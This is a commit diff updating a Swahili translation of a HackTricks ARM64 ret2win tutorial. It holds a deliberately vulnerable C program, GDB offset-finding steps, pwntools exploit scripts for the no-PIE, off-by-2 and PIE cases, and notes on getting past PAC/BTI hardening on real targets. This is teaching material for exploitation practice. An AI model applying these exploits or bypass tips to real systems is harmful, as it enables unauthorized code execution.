mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/binary-exploitation/stack-overflow/ret2win/ret2win-arm6
This commit is contained in:
Translator
parent
9f90adec3b
commit
b811c3dc78
@ -4,6 +4,7 @@
|
||||
|
||||
Pata utangulizi wa arm64 katika:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -27,17 +28,29 @@ vulnerable_function();
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
Kusanya bila pie na canary:
|
||||
Jenga bila pie na canary:
|
||||
```bash
|
||||
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||||
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none
|
||||
```
|
||||
- Bendera ya ziada `-mbranch-protection=none` inazuia AArch64 Branch Protection (PAC/BTI). Ikiwa toolchain yako kwa chaguo-msingi inaweka PAC au BTI, hii hufanya maabara iwe ya kurudiwa. Ili kukagua kama binary iliyojengwa inatumia PAC/BTI unaweza:
|
||||
- Tafuta sifa za AArch64 GNU:
|
||||
- `readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'`
|
||||
- Chunguza prologues/epilogues kwa `paciasp`/`autiasp` (PAC) au kwa `bti c` landing pads (BTI):
|
||||
- `objdump -d ret2win | head -n 40`
|
||||
|
||||
### Ukweli mfupi kuhusu AArch64 calling convention
|
||||
|
||||
- The link register is `x30` (a.k.a. `lr`), and functions typically save `x29`/`x30` with `stp x29, x30, [sp, #-16]!` and restore them with `ldp x29, x30, [sp], #16; ret`.
|
||||
- This means the saved return address lives at `sp+8` relative to the frame base. With a `char buffer[64]` placed below, the usual overwrite distance to the saved `x30` is 64 (buffer) + 8 (saved x29) = 72 bytes — exactly what we’ll find below.
|
||||
- The stack pointer must remain 16‑byte aligned at function boundaries. If you build ROP chains later for more complex scenarios, keep the SP alignment or you may crash on function epilogues.
|
||||
|
||||
## Kupata offset
|
||||
|
||||
### Chaguo la Mchoro
|
||||
### Chaguo la pattern
|
||||
|
||||
Mfano huu ulitengenezwa kwa kutumia [**GEF**](https://github.com/bata24/gef):
|
||||
|
||||
Anza gdb na gef, tengeneza mchoro na uutumia:
|
||||
Anzisha gdb na gef, tengeneza pattern na uitumie:
|
||||
```bash
|
||||
gdb -q ./ret2win
|
||||
pattern create 200
|
||||
@ -45,17 +58,17 @@ run
|
||||
```
|
||||
<figure><img src="../../../images/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
arm64 itajaribu kurudi kwenye anwani katika register x30 (ambayo ilikua imeharibiwa), tunaweza kutumia hiyo kupata offset ya muundo:
|
||||
arm64 itajaribu kurudi kwa anwani katika register x30 (iliyoharibika), tunaweza kutumia hiyo kupata pattern offset:
|
||||
```bash
|
||||
pattern search $x30
|
||||
```
|
||||
<figure><img src="../../../images/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Kipimo ni 72 (9x48).**
|
||||
**Offset ni 72 (9x48).**
|
||||
|
||||
### Chaguo la kipimo cha stack
|
||||
### Stack offset chaguo
|
||||
|
||||
Anza kwa kupata anwani ya stack ambapo register ya pc imehifadhiwa:
|
||||
Anza kwa kupata stack address ambapo pc register imehifadhiwa:
|
||||
```bash
|
||||
gdb -q ./ret2win
|
||||
b *vulnerable_function + 0xc
|
||||
@ -64,14 +77,14 @@ info frame
|
||||
```
|
||||
<figure><img src="../../../images/image (1207).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Sasa weka breakpoint baada ya `read()` na uendelee hadi `read()` itakapotekelezwa na uweke muundo kama 13371337:
|
||||
Sasa weka breakpoint baada ya `read()`, endelea hadi `read()` itakapotekelezwa, kisha weka pattern kama 13371337:
|
||||
```
|
||||
b *vulnerable_function+28
|
||||
c
|
||||
```
|
||||
<figure><img src="../../../images/image (1208).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Pata mahali ambapo muundo huu umehifadhiwa katika kumbukumbu:
|
||||
Gundua wapi muundo huu umehifadhiwa katika kumbukumbu:
|
||||
|
||||
<figure><img src="../../../images/image (1209).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
@ -79,23 +92,25 @@ Kisha: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||||
|
||||
<figure><img src="../../../images/image (1210).png" alt="" width="339"><figcaption></figcaption></figure>
|
||||
|
||||
## Hakuna PIE
|
||||
## No PIE
|
||||
|
||||
### Kawaida
|
||||
### Ya kawaida
|
||||
|
||||
Pata anwani ya kazi ya **`win`**:
|
||||
Pata anwani ya function ya **`win`**:
|
||||
```bash
|
||||
objdump -d ret2win | grep win
|
||||
ret2win: file format elf64-littleaarch64
|
||||
00000000004006c4 <win>:
|
||||
```
|
||||
Kuvunja:
|
||||
Exploit:
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
# Configuration
|
||||
binary_name = './ret2win'
|
||||
p = process(binary_name)
|
||||
# Optional but nice for AArch64
|
||||
context.arch = 'aarch64'
|
||||
|
||||
# Prepare the payload
|
||||
offset = 72
|
||||
@ -113,7 +128,7 @@ p.close()
|
||||
|
||||
### Off-by-1
|
||||
|
||||
Kwa kweli hii itakuwa kama off-by-2 katika PC iliyohifadhiwa kwenye stack. Badala ya kufuta anwani zote za kurudi, tutafuta **tu bytes 2 za mwisho** kwa `0x06c4`.
|
||||
Kwa kweli hii itakuwa zaidi kama off-by-2 kwenye PC iliyohifadhiwa kwenye stack. Badala ya kuandika juu ya return address yote, tutaandika tena **baiti 2 za mwisho pekee** na `0x06c4`.
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
@ -135,16 +150,16 @@ p.close()
|
||||
```
|
||||
<figure><img src="../../../images/image (1212).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||
|
||||
Unaweza kupata mfano mwingine wa off-by-one katika ARM64 katika [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), ambayo ni off-by-**one** halisi katika udhaifu wa kufikirika.
|
||||
Unaweza kupata mfano mwingine wa off-by-one kwenye ARM64 kwenye [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), ambao ni off-by-**one** halisi katika udhaifu wa kubuni.
|
||||
|
||||
## Pamoja na PIE
|
||||
## Kwa PIE
|
||||
|
||||
> [!TIP]
|
||||
> Jenga binary **bila ya hoja `-no-pie`**
|
||||
> Jenga binary **bila hoja ya `-no-pie`**
|
||||
|
||||
### Off-by-2
|
||||
|
||||
Bila ya leak hatujui anwani halisi ya kazi ya kushinda lakini tunaweza kujua offset ya kazi kutoka kwa binary na kujua kwamba anwani ya kurudi tunayopitisha tayari inaelekeza kwenye anwani ya karibu, inawezekana kuvuja offset kwa kazi ya kushinda (**0x7d4**) katika kesi hii na kutumia tu offset hiyo:
|
||||
Bila leak hatujui anwani kamili ya win function lakini tunaweza kujua offset ya function kutoka binary na tukijua kwamba return address tunayoandika juu yake tayari inarejea kwa anwani iliyo karibu, inawezekana leak offset ya win function (**0x7d4**) katika kesi hii na kutumia offset hiyo tu:
|
||||
|
||||
<figure><img src="../../../images/image (1213).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||
```python
|
||||
@ -166,4 +181,45 @@ p.send(payload)
|
||||
print(p.recvline())
|
||||
p.close()
|
||||
```
|
||||
### Notes on modern AArch64 hardening (PAC/BTI) and ret2win
|
||||
|
||||
- Ikiwa binary imejengwa kwa AArch64 Branch Protection, unaweza kuona `paciasp`/`autiasp` au `bti c` zikizalishwa katika prologue/epilogue za function. Katika hali hiyo:
|
||||
- Kurudi kwa anwani ambayo si BTI landing pad halali kunaweza kusababisha `SIGILL`. Tumia kulenga entry halisi ya function inayojumuisha `bti c`.
|
||||
- Ikiwa PAC imewezeshwa kwa returns, kuandika upya return‑address kwa njia rahisi kunaweza kushindwa kwa sababu epilogue inafanya authentication ya `x30`. Kwa mafunzo, jenga upya na `-mbranch-protection=none` (imeonyeshwa hapo juu). Unaposhambulia targets halisi, pendelea hijack zisizo za return (mfano, function pointer overwrites) au jenga ROP ambayo haitawahi kutekeleza jozi ya `autiasp`/`ret` inayothibitisha LR yako bandia.
|
||||
- Kuangalia sifa kwa haraka:
|
||||
- `readelf --notes -W ./ret2win` na tazama taarifa za `AARCH64_FEATURE_1_BTI` / `AARCH64_FEATURE_1_PAC`.
|
||||
- `objdump -d ./ret2win | head -n 40` na tazama `bti c`, `paciasp`, `autiasp`.
|
||||
|
||||
### Running on non‑ARM64 hosts (qemu‑user quick tip)
|
||||
|
||||
If you are on x86_64 but want to practice AArch64:
|
||||
```bash
|
||||
# Install qemu-user and AArch64 libs (Debian/Ubuntu)
|
||||
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross
|
||||
|
||||
# Run the binary with the AArch64 loader environment
|
||||
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win
|
||||
|
||||
# Debug with GDB (qemu-user gdbstub)
|
||||
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
|
||||
# In another terminal
|
||||
gdb-multiarch ./ret2win -ex 'target remote :1234'
|
||||
```
|
||||
### Kurasa zinazohusiana za HackTricks
|
||||
|
||||
-
|
||||
{{#ref}}
|
||||
../../rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
|
||||
{{#endref}}
|
||||
-
|
||||
{{#ref}}
|
||||
../../rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
|
||||
## Marejeo
|
||||
|
||||
- Kuwezesha PAC na BTI kwenye AArch64 kwa Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
|
||||
- Kiwango cha Mwito wa Taratibu kwa Architecture ya Arm ya 64-bit (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user